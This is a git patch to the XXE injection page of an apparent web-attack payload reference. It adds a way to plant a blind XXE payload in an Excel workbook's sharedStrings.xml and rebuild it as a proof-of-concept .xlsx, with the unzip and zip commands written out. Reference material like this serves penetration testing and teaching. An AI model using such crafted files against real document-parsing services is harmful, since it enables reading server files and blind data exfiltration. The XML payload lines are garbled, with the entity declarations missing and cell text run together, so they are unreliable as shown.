From 7733d4495e2dcc4180225197ef143c5b3fde2d3d Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Tue, 8 Dec 2020 09:50:30 +0100 Subject: [PATCH] add another example of XXE in XLSX --- XXE Injection/README.md | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index 44fd88d..9ff9ba9 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -462,7 +462,7 @@ GIF (experimental) Extract the excel file. -```powershell +``` $ mkdir XXE && cd XXE $ unzip ../XXE.xlsx Archive: ../XXE.xlsx @@ -479,16 +479,24 @@ Archive: ../XXE.xlsx Add your blind XXE payload inside `xl/workbook.xml`. -```powershell +```xml ]> &xxe; ``` +Alternativly, add your payload in `xl/sharedStrings.xml`: + +```xml + + ]> +&xxe;testA2testA3testA4testA5testB1testB2testB3testB4testB5 +``` + Rebuild the Excel file. -```powershell +``` $ zip -r ../poc.xlsx * updating: [Content_Types].xml (deflated 71%) updating: _rels/ (stored 0%) @@ -539,6 +547,7 @@ cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) * [Automating local DTD discovery for XXE exploitation](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - July 16 2019 by Philippe Arteau * [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) +* [excel-reader-xlsx #10](https://github.com/jmcnamara/excel-reader-xlsx/issues/10) * [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube) * [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon * [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK